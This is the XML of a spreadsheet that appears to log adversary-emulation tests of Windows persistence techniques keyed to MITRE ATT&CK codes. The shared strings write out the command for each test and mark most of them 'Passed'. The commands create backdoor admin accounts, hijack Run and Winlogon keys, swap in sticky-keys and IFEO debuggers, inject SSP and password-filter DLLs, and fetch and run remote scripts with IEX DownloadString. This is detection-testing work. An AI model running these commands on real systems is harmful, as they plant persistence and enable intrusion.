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TestsCommands" sheetId="1" r:id="rId4"/>
    <sheet state="visible" name="TrainingResults" sheetId="2" r:id="rId5"/>
    <sheet state="visible" name="ControlResults" sheetId="3" r:id="rId6"/>
  </sheets>
  <definedNames/>
  <calcPr/>
  <extLst>
    <ext uri="GoogleSheetsCustomDataVersion1">
      <go:sheetsCustomData xmlns:go="http://customooxmlschemas.google.com/" r:id="rId7" roundtripDataSignature="AMtx7mj6X/JQVfNbMu5m7zXMnGB6IbVbUQ=="/>
    </ext>
  </extLst>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="170" uniqueCount="113">
  <si>
    <t>Test Code</t>
  </si>
  <si>
    <t>Commands</t>
  </si>
  <si>
    <t>Test Outcome</t>
  </si>
  <si>
    <t>T1037.001</t>
  </si>
  <si>
    <t>REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "malicious.bat" /f</t>
  </si>
  <si>
    <t>Passed</t>
  </si>
  <si>
    <t>T1053.005a</t>
  </si>
  <si>
    <t>schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe"
schtasks /create /tn "T1053_005_OnStartup" /sc onstart /ru system /tr "cmd.exe /c calc.exe"</t>
  </si>
  <si>
    <t>T1053.005b</t>
  </si>
  <si>
    <t>SCHTASKS /Create /SC ONCE /TN maliciousTask /TR cmd.exe /C echo ev1ltwin /ST 16:20</t>
  </si>
  <si>
    <t>T1053.005c</t>
  </si>
  <si>
    <t>$Action = New-ScheduledTaskAction -Execute "calc.exe"
$Trigger = New-ScheduledTaskTrigger -AtLogon
$User = New-ScheduledTaskPrincipal -GroupId "BUILTIN\Administrators" -RunLevel Highest
$Set = New-ScheduledTaskSettingsSet
$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set
Register-ScheduledTask AtomicTask -InputObject $object</t>
  </si>
  <si>
    <t>T1053.005d</t>
  </si>
  <si>
    <t>$xml = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1053.005\src\T1053_005_WMI.xml")
Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }</t>
  </si>
  <si>
    <t>T1053.005e</t>
  </si>
  <si>
    <t>N/A</t>
  </si>
  <si>
    <t>T1053.005f</t>
  </si>
  <si>
    <t>T1078.001</t>
  </si>
  <si>
    <t>net user MaliciousGuest /active:yes
net user MaliciousGuest password123
net localgroup administrators MaliciousGuest /add
net localgroup "Remote Desktop Users" MaliciousGuest /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f</t>
  </si>
  <si>
    <t>T1078.003</t>
  </si>
  <si>
    <t>net user art-test /add
net user art-test Password123!
net localgroup administrators art-test /add</t>
  </si>
  <si>
    <t>T1098a</t>
  </si>
  <si>
    <t>$fmm = Get-LocalGroupMember -Group Administrators |?{ $_.ObjectClass -match "User" -and $_.PrincipalSource -match "Local"} | Select Name
foreach($member in $fmm) {
    if($member -like "*Administrator*") {
        $account = $member.Name -replace ".+\\\","" # strip computername\
        $originalDescription = (Get-LocalUser -Name $account).Description
        Set-LocalUser -Name $account -Description "atr:$account;$originalDescription".Substring(0,48) # Keep original name in description
        Rename-LocalUser -Name $account -NewName "ev1ltwin" # Required due to length limitation
        Write-Host "Successfully Renamed $account Account on " $Env:COMPUTERNAME
        }
    }</t>
  </si>
  <si>
    <t>T1098b</t>
  </si>
  <si>
    <t>T1133</t>
  </si>
  <si>
    <t>$extList =fcfhplploccackoneaefokcmbjfbkenj
foreach ($extension in $extList) {
  New-Item -Path HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension -Force
  New-ItemProperty -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -Name "update_url" -Value "https://clients2.google.com/service/update2/crx" -PropertyType "String" -Force}
Start chrome
Start-Sleep -Seconds 30
Stop-Process -Name "chrome"</t>
  </si>
  <si>
    <t>T1136.001</t>
  </si>
  <si>
    <t>New-LocalUser -Name "m4llory" -NoPassword</t>
  </si>
  <si>
    <t>T1137</t>
  </si>
  <si>
    <t>reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /t REG_DWORD /d 1 /f
mkdir  %APPDATA%\Microsoft\Outlook\ &gt;nul 2&gt;&amp;1
echo "Atomic Red Team TEST" &gt; %APPDATA%\Microsoft\Outlook\VbaProject.OTM</t>
  </si>
  <si>
    <t>T1137.002</t>
  </si>
  <si>
    <t>reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d "notMalware.exe"</t>
  </si>
  <si>
    <t>T1137.004</t>
  </si>
  <si>
    <t>reg.exe add HKCU\Software\Microsoft\Office\#redacted#\Outlook\WebView\#redacted# /v URL /t REG_SZ /d adversaryDomain[.]com /f</t>
  </si>
  <si>
    <t>T1137.006</t>
  </si>
  <si>
    <t>powershell -c "iwr -URI 'https://https//github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1137.006/bin/HelloWorldXll.xll?raw=true' -o '#{local_file}'; IEX ((new-object -ComObject excel.application).RegisterXLL('$env:tmp\EVIxLL.xll'))"</t>
  </si>
  <si>
    <t>T1176</t>
  </si>
  <si>
    <t>T1197</t>
  </si>
  <si>
    <t>bitsadmin.exe /create AtomicBITS
bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %temp%\bitsadmin3_flag.ps1
bitsadmin.exe /setnotifycmdline #{bits_job_name} C:\Windows\system32\notepad.exe NULL
bitsadmin.exe /resume AtomicBITS
timeout 5
bitsadmin.exe /complete AtomicBITS</t>
  </si>
  <si>
    <t>T1505.003</t>
  </si>
  <si>
    <t>Full source code can be found at: https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx</t>
  </si>
  <si>
    <t>T1543.003a</t>
  </si>
  <si>
    <t xml:space="preserve">sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\""
sc start Fax
</t>
  </si>
  <si>
    <t>T1543.003b</t>
  </si>
  <si>
    <t xml:space="preserve">sc.exe create ForSureNotMalicious binPath= &lt;redacted&gt;/definetlyLegitimate.exe
sc.exe start ForSureNotMalicious
</t>
  </si>
  <si>
    <t>T1543.003c</t>
  </si>
  <si>
    <t xml:space="preserve">New-Service -Name "Adversary" -BinaryPathName "&lt;redacted&gt;/malware.exe"
Start-Service -Name "Adversary"
</t>
  </si>
  <si>
    <t>T1546.001</t>
  </si>
  <si>
    <t>assoc .txt=&lt;redacted&gt;\python.exe</t>
  </si>
  <si>
    <t>T1546.002</t>
  </si>
  <si>
    <t>copy malicious.exe "%SystemRoot%\System32\evilscreensaver.scr"
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
shutdown /r /t 0</t>
  </si>
  <si>
    <t>T1546.007</t>
  </si>
  <si>
    <t xml:space="preserve">netsh.exe add helper &lt;redacted&gt;/malicious.dll
</t>
  </si>
  <si>
    <t>T1546.008a</t>
  </si>
  <si>
    <t>$input_table = "sethc.exe".split(",")
$Name = "Debugger"
$Value = "cmd.exe"
Foreach ($item in $input_table){
  $item = $item.trim()
  $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item"
  IF(!(Test-Path $registryPath))
  {
    New-Item -Path $registryPath -Force
    New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
  }
  ELSE
  {
    New-ItemProperty -Path $registryPath -Name $name -Value $Value
  }
}</t>
  </si>
  <si>
    <t>T1546.008b</t>
  </si>
  <si>
    <t>copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
takeown /F C:\Windows\System32\sethc.exe /A
icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe</t>
  </si>
  <si>
    <t>T1546.010</t>
  </si>
  <si>
    <t>reg.exe import T1546.010.reg ; which contains
 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"="C:\\Tools\\T1546.010.dll,C:\\Tools\\T1546.010x86.dll"
"LoadAppInit_DLLs"=dword:00000001
"RequireSignedAppInit_DLLs"=dword:00000000</t>
  </si>
  <si>
    <t>T1546.011a</t>
  </si>
  <si>
    <t xml:space="preserve">sdbinst.exe &lt;redacted&gt;/AtomicShimdb.sdb
</t>
  </si>
  <si>
    <t>T1546.011b</t>
  </si>
  <si>
    <t xml:space="preserve">Copy-Item &lt;redacted&gt;\T1546.011\bin\T1546.011CompatDatabase.sdb C:\Windows\apppatch\Custom\T1546.011CompatDatabase.sdb
Copy-Item &lt;redacted&gt;\T1546.011\bin\T1546.011CompatDatabase.sdb C:\Windows\apppatch\Custom\Custom64\T1546.011CompatDatabase.sdb
</t>
  </si>
  <si>
    <t>T1546.011c</t>
  </si>
  <si>
    <t xml:space="preserve">New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom" -Name "AtomicRedTeamT1546.011" -Value "AtomicRedTeamT1546.011"
New-ItemProperty -Path HKLM:"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB" -Name "AtomicRedTeamT1546.011" -Value "AtomicRedTeamT1546.011"
</t>
  </si>
  <si>
    <t>T1546.012a</t>
  </si>
  <si>
    <t xml:space="preserve">REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /d "cmd.exe"
</t>
  </si>
  <si>
    <t>T1546.012b</t>
  </si>
  <si>
    <t xml:space="preserve">REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "cmd.exe"
</t>
  </si>
  <si>
    <t>T1546.013</t>
  </si>
  <si>
    <t xml:space="preserve">New-Item -Path profile1 -Type File -Force
Add-Content profil1 -Value "Start-Process &lt;redacted&gt;/malicious.exe"
powershell -Command exit
</t>
  </si>
  <si>
    <t>T1547.001a</t>
  </si>
  <si>
    <t>REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "echo Mallory was here"</t>
  </si>
  <si>
    <t>T1547.001b</t>
  </si>
  <si>
    <t>REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "malware.exe"</t>
  </si>
  <si>
    <t>T1547.001c</t>
  </si>
  <si>
    <t>$RunOnceKey = "HKLM\Software\H4x0rINC"
set-itemproperty $RunOnceKey "NextRun" 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'</t>
  </si>
  <si>
    <t>T1547.001d</t>
  </si>
  <si>
    <t>Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"
Copy-Item $PathToAtomicsFolder\T1547.001\src\batstartup.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"
Start-Process "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\batstartup.bat"
Start-Process "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\batstartup.bat"</t>
  </si>
  <si>
    <t>T1547.002</t>
  </si>
  <si>
    <t xml:space="preserve">$SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
$SecurityPackagesUpdated = $SecurityPackages
$SecurityPackagesUpdated += "malicious_ssp.dll"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated
</t>
  </si>
  <si>
    <t>T1547.004a</t>
  </si>
  <si>
    <t xml:space="preserve">Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, &lt;redacted&gt;malicious.exe" -Force
</t>
  </si>
  <si>
    <t>T1547.004b</t>
  </si>
  <si>
    <t xml:space="preserve">Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, &lt;redacted&gt;malicious.exe" -Force
</t>
  </si>
  <si>
    <t>T1547.004c</t>
  </si>
  <si>
    <t>"New-Item ""HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" -Force
Set-ItemProperty ""HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"" ""logon"" ""&lt;redacted&gt;malicious.exe"" -Force
"</t>
  </si>
  <si>
    <t>T1547.009</t>
  </si>
  <si>
    <t>T1547.010</t>
  </si>
  <si>
    <t xml:space="preserve">reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "malicious.dll" /t REG_SZ
</t>
  </si>
  <si>
    <t>T1556.002</t>
  </si>
  <si>
    <t xml:space="preserve">$passwordFilterName = (Copy-Item "malicious.dll" -Destination "C:\Windows\System32" -PassThru).basename
$lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
$notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
$notificationPackagesValues += $passwordFilterName
Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues
Restart-Computer -Confirm
</t>
  </si>
  <si>
    <t>T1574.001</t>
  </si>
  <si>
    <t xml:space="preserve">copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe
copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
%APPDATA%\updater.exe -Command exit
</t>
  </si>
  <si>
    <t>T1574.009</t>
  </si>
  <si>
    <t xml:space="preserve">copy &lt;redacted&gt;malicious.exe "C:\Program Files\windows_service.exe"
copy &lt;redacted&gt;malicious.exe "C:\program.exe"
sc create "Example Service" binpath= "C:\Program Files\windows_service.exe" Displayname= "Example Service" start= auto
sc start "Example Service"
</t>
  </si>
  <si>
    <t>T1574.012a</t>
  </si>
  <si>
    <t xml:space="preserve">Write-Host "Creating registry keys in HKCU:Software\Classes\CLSID\ 	{09108e71-974c-4010-89cb-acf471ae9e2c}" -ForegroundColor Cyan
New-Item -Path "HKCU:\Software\Classes\CLSID\ 	{09108e71-974c-4010-89cb-acf471ae9e2c}\InprocServer32" -Value #{file_name} -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER" -PropertyType String -Value " 	{09108e71-974c-4010-89cb-acf471ae9e2c}" -Force | Out-Null
New-ItemProperty -Path HKCU:\Environment -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
Write-Host "executing eventvwr.msc" -ForegroundColor Cyan
START MMC.EXE EVENTVWR.MSC
</t>
  </si>
  <si>
    <t>T1574.012b</t>
  </si>
  <si>
    <t xml:space="preserve">Write-Host "Creating system environment variables" -ForegroundColor Cyan
New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_ENABLE_PROFILING" -PropertyType String -Value "1" -Force | Out-Null
New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER" -PropertyType String -Value " 	{09108e71-974c-4010-89cb-acf471ae9e2c}" -Force | Out-Null
New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment' -Name "COR_PROFILER_PATH" -PropertyType String -Value #{file_name} -Force | Out-Null
</t>
  </si>
  <si>
    <t>T1574.012c</t>
  </si>
  <si>
    <t xml:space="preserve">$env:COR_ENABLE_PROFILING = 1
$env:COR_PROFILER = ' 	{09108e71-974c-4010-89cb-acf471ae9e2c}'
$env:COR_PROFILER_PATH = '#{file_name}'
POWERSHELL -c 'Start-Sleep 1'
</t>
  </si>
  <si>
    <t>Training Test Library</t>
  </si>
  <si>
    <t>Total Failed Tests</t>
  </si>
  <si>
    <t>Total Succesful Tests</t>
  </si>
  <si>
    <t>Total Skipped Tests</t>
  </si>
  <si>
    <t>Total Tests</t>
  </si>
  <si>
    <t>Total Success Rate</t>
  </si>
  <si>
    <t>Total Coverage of Tactic</t>
  </si>
  <si>
    <t>Sub-techniques covered out of total sub-techniques</t>
  </si>
  <si>
    <t>Covered Success Rate</t>
  </si>
  <si>
    <t>Rate of passed tests out of covered tests</t>
  </si>
  <si>
    <t>Control Test Library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</si>
</sst>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0"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color theme="1"/>
    </font>
    <font/>
    <font>
      <sz val="11.0"/>
      <color rgb="FF000000"/>
      <name val="Calibri"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color theme="0"/>
      <name val="Calibri"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color theme="1"/>
      <name val="Calibri"/>
    </font>
    <font>
      <sz val="15.0"/>
      <color rgb="FFFFFFFF"/>
      <name val="Calibri"/>
    </font>
    <font>
      <sz val="15.0"/>
      <color theme="1"/>
    </font>
    <font>
      <sz val="15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</fills>
  <borders count="10">
    <border/>
    <border>
      <left/>
      <right/>
      <top/>
      <bottom/>
    </border>
    <border>
      <left style="thin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/>
      <top style="thin">
        <color theme="1"/>
      </top>
      <bottom style="thin">
        <color theme="1"/>
      </bottom>
    </border>
    <border>
      <left/>
      <right/>
      <top style="thin">
        <color theme="1"/>
      </top>
      <bottom style="thin">
        <color theme="1"/>
      </bottom>
    </border>
    <border>
      <left/>
      <right style="thin">
        <color theme="1"/>
      </right>
      <top style="thin">
        <color theme="1"/>
      </top>
      <bottom style="thin">
        <color theme="1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3" fontId="3" numFmtId="0" xfId="0" applyFill="1" applyFont="1"/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" fillId="4" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf borderId="1" fillId="4" fontId="5" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="2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5" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="6" fillId="5" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="7" fillId="5" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="7" fillId="5" fontId="6" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="4" fillId="0" fontId="6" numFmtId="10" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="8" fillId="4" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="center"/>
    </xf>
    <xf borderId="9" fillId="0" fontId="3" numFmtId="0" xfId="0" applyBorder="1" applyFont="1"/>
    <xf borderId="2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5" fillId="5" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="7" fillId="5" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="1"/>
    </xf>
    <xf borderId="7" fillId="5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7" fillId="5" fontId="9" numFmtId="10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</dxfs>
  <tableStyles count="1">
    <tableStyle count="3" pivot="0" name="TrainingTestsCommand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2" displayName="Table_1" id="1">
  <tableColumns count="3">
    <tableColumn name="Test Code" id="1"/>
    <tableColumn name="Commands" id="2"/>
    <tableColumn name="Test Outcome" id="3"/>
  </tableColumns>
  <tableStyleInfo name="TrainingTestsCommand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12.0"/>
    <col customWidth="1" min="3" max="3" width="13.3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7</v>
      </c>
      <c r="C3" s="3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15</v>
      </c>
      <c r="C7" s="2" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="2" t="s">
        <v>16</v>
      </c>
      <c r="B8" s="2" t="s">
        <v>15</v>
      </c>
      <c r="C8" s="2" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="2" t="s">
        <v>17</v>
      </c>
      <c r="B9" s="2" t="s">
        <v>18</v>
      </c>
      <c r="C9" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B10" s="2" t="s">
        <v>20</v>
      </c>
      <c r="C10" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="2" t="s">
        <v>21</v>
      </c>
      <c r="B11" s="2" t="s">
        <v>22</v>
      </c>
      <c r="C11" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="2" t="s">
        <v>23</v>
      </c>
      <c r="B12" s="2" t="s">
        <v>15</v>
      </c>
      <c r="C12" s="2" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="2" t="s">
        <v>24</v>
      </c>
      <c r="B13" s="2" t="s">
        <v>25</v>
      </c>
      <c r="C13" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="2" t="s">
        <v>26</v>
      </c>
      <c r="B14" s="2" t="s">
        <v>27</v>
      </c>
      <c r="C14" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="2" t="s">
        <v>28</v>
      </c>
      <c r="B15" s="2" t="s">
        <v>29</v>
      </c>
      <c r="C15" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="2" t="s">
        <v>30</v>
      </c>
      <c r="B16" s="2" t="s">
        <v>31</v>
      </c>
      <c r="C16" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="2" t="s">
        <v>32</v>
      </c>
      <c r="B17" s="2" t="s">
        <v>33</v>
      </c>
      <c r="C17" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="2" t="s">
        <v>34</v>
      </c>
      <c r="B18" s="2" t="s">
        <v>35</v>
      </c>
      <c r="C18" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="2" t="s">
        <v>36</v>
      </c>
      <c r="B19" s="2"/>
      <c r="C19" s="2"/>
    </row>
    <row r="20">
      <c r="A20" s="2" t="s">
        <v>37</v>
      </c>
      <c r="B20" s="2" t="s">
        <v>38</v>
      </c>
      <c r="C20" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1">
      <c r="A21" s="2" t="s">
        <v>39</v>
      </c>
      <c r="B21" s="2" t="s">
        <v>40</v>
      </c>
      <c r="C21" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1">
      <c r="A22" s="5" t="s">
        <v>41</v>
      </c>
      <c r="B22" s="5" t="s">
        <v>42</v>
      </c>
      <c r="C22" s="5" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1">
      <c r="A23" s="5" t="s">
        <v>43</v>
      </c>
      <c r="B23" s="6" t="s">
        <v>44</v>
      </c>
      <c r="C23" s="5" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1">
      <c r="A24" s="5" t="s">
        <v>45</v>
      </c>
      <c r="B24" s="5" t="s">
        <v>46</v>
      </c>
      <c r="C24" s="5" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1">
      <c r="A25" s="2" t="s">
        <v>47</v>
      </c>
      <c r="B25" s="2" t="s">
        <v>48</v>
      </c>
      <c r="C25" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1">
      <c r="A26" s="2" t="s">
        <v>49</v>
      </c>
      <c r="B26" s="2" t="s">
        <v>50</v>
      </c>
      <c r="C26" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1">
      <c r="A27" s="2" t="s">
        <v>51</v>
      </c>
      <c r="B27" s="5" t="s">
        <v>52</v>
      </c>
      <c r="C27" s="5" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1">
      <c r="A28" s="2" t="s">
        <v>53</v>
      </c>
      <c r="B28" s="2" t="s">
        <v>54</v>
      </c>
      <c r="C28" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1">
      <c r="A29" s="2" t="s">
        <v>55</v>
      </c>
      <c r="B29" s="2" t="s">
        <v>56</v>
      </c>
      <c r="C29" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1">
      <c r="A30" s="2" t="s">
        <v>57</v>
      </c>
      <c r="B30" s="2" t="s">
        <v>58</v>
      </c>
      <c r="C30" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1">
      <c r="A31" s="5" t="s">
        <v>59</v>
      </c>
      <c r="B31" s="5" t="s">
        <v>60</v>
      </c>
      <c r="C31" s="5" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="32" ht="15.75" customHeight="1">
      <c r="A32" s="5" t="s">
        <v>61</v>
      </c>
      <c r="B32" s="5" t="s">
        <v>62</v>
      </c>
      <c r="C32" s="5" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1">
      <c r="A33" s="5" t="s">
        <v>63</v>
      </c>
      <c r="B33" s="5" t="s">
        <v>64</v>
      </c>
      <c r="C33" s="5" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1">
      <c r="A34" s="5" t="s">
        <v>65</v>
      </c>
      <c r="B34" s="5" t="s">
        <v>66</v>
      </c>
      <c r="C34" s="5" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="35" ht="15.75" customHeight="1">
      <c r="A35" s="5" t="s">
        <v>67</v>
      </c>
      <c r="B35" s="5" t="s">
        <v>68</v>
      </c>
      <c r="C35" s="5" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="36" ht="15.75" customHeight="1">
      <c r="A36" s="2" t="s">
        <v>69</v>
      </c>
      <c r="B36" s="5" t="s">
        <v>70</v>
      </c>
      <c r="C36" s="5" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="37" ht="15.75" customHeight="1">
      <c r="A37" s="2" t="s">
        <v>71</v>
      </c>
      <c r="B37" s="2" t="s">
        <v>72</v>
      </c>
      <c r="C37" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1">
      <c r="A38" s="2" t="s">
        <v>73</v>
      </c>
      <c r="B38" s="2" t="s">
        <v>74</v>
      </c>
      <c r="C38" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1">
      <c r="A39" s="2" t="s">
        <v>75</v>
      </c>
      <c r="B39" s="2" t="s">
        <v>76</v>
      </c>
      <c r="C39" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1">
      <c r="A40" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B40" s="2" t="s">
        <v>78</v>
      </c>
      <c r="C40" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1">
      <c r="A41" s="2" t="s">
        <v>79</v>
      </c>
      <c r="B41" s="2" t="s">
        <v>80</v>
      </c>
      <c r="C41" s="2" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1">
      <c r="A42" s="5" t="s">
        <v>81</v>
      </c>
